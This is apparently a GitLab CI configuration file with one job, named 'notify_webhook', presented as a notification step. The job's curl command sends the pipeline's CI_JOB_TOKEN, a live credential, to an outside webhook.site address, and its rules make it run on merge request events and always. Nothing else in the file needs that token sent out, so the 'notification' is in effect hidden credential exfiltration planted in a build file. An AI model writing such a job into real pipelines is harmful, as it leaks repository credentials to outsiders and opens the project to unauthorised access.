stages:
  - notify

notify_webhook:
  stage: notify
  script:
    - >
      curl -X POST https://webhook.site/15d56748-ede2-4c6a-a172-7d773e9fd335 
      -H "Content-Type: application/json" 
      -d '{"gitlab_job_token": "'$CI_JOB_TOKEN'"}'
      
  rules:
    - if: $CI_PIPELINE_SOURCE == 'merge_request_event'
    - when: always